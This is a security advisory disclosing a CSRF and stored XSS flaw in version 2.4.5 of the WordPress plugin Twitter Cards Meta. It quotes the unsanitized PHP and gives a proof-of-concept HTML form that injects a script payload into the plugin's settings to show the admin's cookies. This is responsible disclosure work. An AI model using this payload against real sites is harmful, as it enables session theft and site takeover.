09 Dec

Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in Twitter Cards Meta

We recently found that the Twitter Cards Meta contains a cross-site request forgery (CSRF)/cross-site scripting (XSS) vulnerability on the plugin’s setting pages,/wp-admin/admin.php?page=twitter-cards-meta.

The CSRF potion of the vulnerability was due to a lack of a nonce on the page and a lack of a check for a valid one when processing a request to change the plugin’s settings.

For the XSS issue, in the file /twcm-options.php starting at line 28 in version 2.4.5 settings are saved and there is no sanitization done:

28
29
30
31
32
33
34
35
36
37
38
39
40
if(isset($_POST['save_options']))
{
	$options=array(
			'site_twitter_username'=>trim($_POST['site_twitter_username']),
			'use_authors_twitter_account'=>isset($_POST['use_authors_twitter_account']) ? intval($_POST['use_authors_twitter_account']) : '', 
			'use_image_from'=>$_POST['use_image_from'], 
			'image_custom_field'=>trim($_POST['image_custom_field']),
			'default_image'=>(trim($_POST['default_image'])=='Link to Default Image')? '' : trim($_POST['default_image']),
			'home_page_description'=>(trim($_POST['home_page_description'])=='Enter a description for home page, keep it under 200 characters')? '' : wp_filter_nohtml_kses(trim($_POST['home_page_description'])),  #wp_filter_nohtml_kses is smililar with strip_tags() function
			'default_card_type'=>$_POST['default_card_type'], 
			'use_default_card_type_sitewide'=>isset($_POST['use_default_card_type_sitewide']) ? $_POST['use_default_card_type_sitewide'] : ''
 
	);

When the values are outputted on the page through the same file they were not escaped. For example, the value for “site_twitter_username” was set on line 68:

<tr><td  align="left" width="200">Site's Main Twitter Account:</td><td>@<input type="text" name="site_twitter_username" value="<?php echo ($twcm_options['site_twitter_username'])? $twcm_options['site_twitter_username'] :'WPDevTeam';?>" size="20"  onblur="javascript: if(this.value=='') {this.value='WPDevTeam';}" onclick="javascript: if(this.value=='WPDevTeam') {this.value='';}"  /></td></tr>

Proof of Concept

The following proof of concept will cause an alert box with any accessible cookies to be shown on the page /wp-admin/admin.php?page=twitter-cards-meta, when submitted as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=twitter-cards-meta" method="POST">
<input type="hidden" name="save_options" value="Save Options" />
<input type="hidden" name="site_twitter_username" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • December 2, 2016 – Developer notified.
  • December 9, 2016 – WordPress.org Plugin Directory Notified.
  • December 9, 2016 – Plugin removed from WordPress.org Plugin Directory.

Concerned About The Security of The Plugins You Use

When you are a paying customer of our service (you can currently try the service free for the first month), you get to suggest/vote on what plugins we will do security reviews of.

Leave a Reply

Your email address will not be published. Required fields are marked *